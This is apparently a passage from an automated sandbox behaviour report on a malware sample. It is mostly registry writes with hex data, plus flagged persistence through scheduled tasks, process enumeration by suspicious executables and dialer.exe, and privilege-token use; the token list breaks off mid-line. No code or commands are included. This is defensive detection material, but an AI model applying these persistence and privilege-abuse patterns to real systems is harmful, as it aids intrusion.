\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fd44db94-ca55-494b- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b7a303d6-4f96-4f11- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a064af26-1f6e-421f- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\936314a9-4f70-490d- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000c43b9417c1c2da0123eb2018c1c2da0123eb2018c1c2da01a5bb07000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000d458d11a2000353561623232313330376535636439643561643637353830643235356138333535333836623361353331353663663663633036366436313535633566383938610000b20009000400efbed458d11ad458d11a2e0000000000000000000000000000000000000000000000000005242100350035006100620032003200310033003000370065003500630064003900640035006100640036003700350038003000640032003500350061003800330035003500330038003600620033006100350033003100350036006300660036006300630030003600360064003600310035003500630035006600380039003800610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000065a33f851000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c35356162323231333037653563643964356164363735383064323535613833353533383662336135333135366366366363303636643631353563356638393861000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000746d756163626c6200000000000000006ab64a1a2e42fe4ca0c710bf0da5f31515e263632528ef1186ec6e9b7344ec166ab64a1a2e42fe4ca0c710bf0da5f31515e263632528ef1186ec6e9b7344ec16ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003000380030003200390032003200370032002d003200300034003000330036003100350030002d0032003100350039003100370031003700370030002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000a1a8d825000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\npm msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Language = "1033" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Media msiexec.exe Key deleted \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\446901c4-9f54-473e- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a72250ba-abde-435b- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000fb146517c1c2da01fb146517c1c2da01fb146517c1c2da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000d458d11a2000353561623232313330376535636439643561643637353830643235356138333535333836623361353331353663663663633036366436313535633566383938610000b20009000400efbed458d11ad458d11a2e0000000000000000000000000000000000000000000000000005242100350035006100620032003200310033003000370065003500630064003900640035006100640036003700350038003000640032003500350061003800330035003500330038003600620033006100350033003100350036006300660036006300630030003600360064003600310035003500630035006600380039003800610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000065a33f851000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c35356162323231333037653563643964356164363735383064323535613833353533383662336135333135366366366363303636643631353563356638393861000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000746d756163626c6200000000000000006ab64a1a2e42fe4ca0c710bf0da5f3150ae263632528ef1186ec6e9b7344ec166ab64a1a2e42fe4ca0c710bf0da5f3150ae263632528ef1186ec6e9b7344ec16ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003000380030003200390032003200370032002d003200300034003000330036003100350030002d0032003100350039003100370031003700370030002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000a1a8d825000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\936314a9-4f70-490d- RuntimeBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\DocumentationShortcuts msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a064af26-1f6e-421f- = "\\\\?\\Volume{25D8A8A1-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\0fdceaca6a5fded0234f237812ebda6e54225b8c1e34bc7bf701d70abeb6700e" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fff0d426-12ad-4b59- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fd44db94-ca55-494b- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fd44db94-ca55-494b- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b7a303d6-4f96-4f11- = 47aa1918c1c2da01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b7a303d6-4f96-4f11- = "\\\\?\\Volume{25D8A8A1-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\22c981b09149ea4353032dc962d2339f4c1b44380f5b071982a2602f0631d62c" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fff0d426-12ad-4b59- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a72250ba-abde-435b- = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a72250ba-abde-435b- = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\936314a9-4f70-490d- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\507abced-6f7b-48fd- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a064af26-1f6e-421f- RuntimeBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPathNode = "EnvironmentPath" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a72250ba-abde-435b- RuntimeBroker.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a1a3e396-acb6-4e2d- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b7a303d6-4f96-4f11- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\45A4.tmp\\" msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a72250ba-abde-435b- = 36506a17c1c2da01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\507abced-6f7b-48fd- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\NodeRuntime msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\PackageCode = "AC6AA920FB9737143A7998E5BED98A71" msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a72250ba-abde-435b- = "\\\\?\\Volume{25D8A8A1-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\55ab221307e5cd9d5ad67580d255a8355386b3a53156cf6cc066d6155c5f898a" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b7a303d6-4f96-4f11- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\507abced-6f7b-48fd- = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\936314a9-4f70-490d- = "8324" RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Net msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Clients = 3a0000000000 msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fff0d426-12ad-4b59- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a72250ba-abde-435b- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a1a3e396-acb6-4e2d- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a1a3e396-acb6-4e2d- = "8324" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fff0d426-12ad-4b59- RuntimeBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\ProductIcon = "C:\\Windows\\Installer\\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\\NodeIcon" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a064af26-1f6e-421f- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000088dead17c1c2da016c351a18c1c2da016c351a18c1c2da01507f09000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000d458d11a2000306664636561636136613566646564303233346632333738313265626461366535343232356238633165333462633762663730316437306162656236373030650000b20009000400efbed458d11ad458d11a2e00000000000000000000000000000000000000000000000000f91e1a00300066006400630065006100630061003600610035006600640065006400300032003300340066003200330037003800310032006500620064006100360065003500340032003200350062003800630031006500330034006200630037006200660037003000310064003700300061006200650062003600370030003000650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000065a33f851000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c30666463656163613661356664656430323334663233373831326562646136653534323235623863316533346263376266373031643730616265623637303065000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000746d756163626c6200000000000000006ab64a1a2e42fe4ca0c710bf0da5f31511e263632528ef1186ec6e9b7344ec166ab64a1a2e42fe4ca0c710bf0da5f31511e263632528ef1186ec6e9b7344ec16ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003000380030003200390032003200370032002d003200300034003000330036003100350030002d0032003100350039003100370031003700370030002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000a1a8d825000000000000d01200000000000000000000000000000000 RuntimeBroker.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2808 schtasks.exe 1640 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exej1dicjdx.pjl1.exeopenwith.exej1dicjdx.pjl2.exepowershell.exedialer.exewmiprvse.exepid process 3944 powershell.exe 3944 powershell.exe 4048 powershell.exe 4048 powershell.exe 4396 powershell.exe 4396 powershell.exe 4396 powershell.exe 1032 j1dicjdx.pjl1.exe 1032 j1dicjdx.pjl1.exe 4516 openwith.exe 4516 openwith.exe 4516 openwith.exe 4516 openwith.exe 1436 j1dicjdx.pjl2.exe 2124 powershell.exe 2124 powershell.exe 2124 powershell.exe 1436 j1dicjdx.pjl2.exe 1436 j1dicjdx.pjl2.exe 1436 j1dicjdx.pjl2.exe 1436 j1dicjdx.pjl2.exe 1436 j1dicjdx.pjl2.exe 1436 j1dicjdx.pjl2.exe 1436 j1dicjdx.pjl2.exe 1436 j1dicjdx.pjl2.exe 1436 j1dicjdx.pjl2.exe 1436 j1dicjdx.pjl2.exe 1436 j1dicjdx.pjl2.exe 1436 j1dicjdx.pjl2.exe 4392 dialer.exe 4392 dialer.exe 1436 j1dicjdx.pjl2.exe 4392 dialer.exe 4392 dialer.exe 184 wmiprvse.exe 184 wmiprvse.exe 184 wmiprvse.exe 184 wmiprvse.exe 184 wmiprvse.exe 4392 dialer.exe 4392 dialer.exe 4392 dialer.exe 4392 dialer.exe 4392 dialer.exe 4392 dialer.exe 184 wmiprvse.exe 184 wmiprvse.exe 184 wmiprvse.exe 184 wmiprvse.exe 184 wmiprvse.exe 4392 dialer.exe 4392 dialer.exe 4392 dialer.exe 4392 dialer.exe 4392 dialer.exe 4392 dialer.exe 4392 dialer.exe 4392 dialer.exe 4392 dialer.exe 4392 dialer.exe 4392 dialer.exe 4392 dialer.exe 4392 dialer.exe 4392 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exepowershell.exej1dicjdx.pjl2.exedialer.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetasklist.exesvchost.exewmiprvse.exetaskkill.exedwm.exeWMIC.exedescription pid process Token: SeDebugPrivilege 3944 powershell.exe Token: SeDebugPrivilege 4048 powershell.exe Token: SeDebugPrivilege 4396 powershell.exe Token: SeDebugPrivilege 5016 tasklist.exe Token: SeDebugPrivilege 4980 taskkill.exe Token: SeDebugPrivilege 636 tasklist.exe Token: SeDebugPrivilege 4760 taskkill.exe Token: SeDebugPrivilege 2912 tasklist.exe Token: SeDebugPrivilege 2808 taskkill.exe Token: SeDebugPrivilege 2924 tasklist.exe Token: SeDebugPrivilege 408 taskkill.exe Token: SeDebugPrivilege 3948 tasklist.exe Token: SeDebugPrivilege 3696 taskkill.exe Token: SeDebugPrivilege 4516 tasklist.exe Token: SeDebugPrivilege 3348 taskkill.exe Token: SeDebugPrivilege 4260 tasklist.exe Token: SeDebugPrivilege 376 taskkill.exe Token: SeDebugPrivilege 2124 powershell.exe Token: SeDebugPrivilege 1436 j1dicjdx.pjl2.exe Token: SeDebugPrivilege 4392 dialer.exe Token: SeShutdownPrivilege 4976 powercfg.exe Token: SeCreatePagefilePrivilege 4976 powercfg.exe Token: SeShutdownPrivilege 4676 powercfg.exe Token: SeCreatePagefilePrivilege 4676 powercfg.exe Token: SeShutdownPrivilege 3544 powercfg.exe Token: SeCreatePagefilePrivilege 3544 powercfg.exe Token: SeShutdownPrivilege 384 powercfg.exe Token: SeCreatePagefilePrivilege 384 powercfg.exe Token: SeDebugPrivilege 3276 tasklist.exe Token: SeAssignPrimaryTokenPrivilege 2080 svchost.exe Token: SeIncreaseQuotaPrivilege 2080 svchost.exe Token: SeSecurityPrivilege 2080 svchost.exe Token: SeTakeOwnershipPrivilege 2080 svchost.exe Token: SeLoadDriverPrivilege 2080 svchost.exe Token: SeSystemtimePrivilege 2080 svchost.exe Token: SeBackupPrivilege 2080 svchost.exe Token: SeRestorePrivilege 2080 svchost.exe Token: SeShutdownPrivilege 2080 svchost.exe Token: SeSystemEnvironmentPrivilege 2080 svchost.exe Token: SeUndockPrivilege 2080 svchost.exe Token: SeManageVolumePrivilege 2080 svchost.exe Token: SeDebugPrivilege 184 wmiprvse.exe Token: SeDebugPrivilege 1392 taskkill.exe Token: SeAssignPrimaryTokenPrivilege 2080 svchost.exe Token: 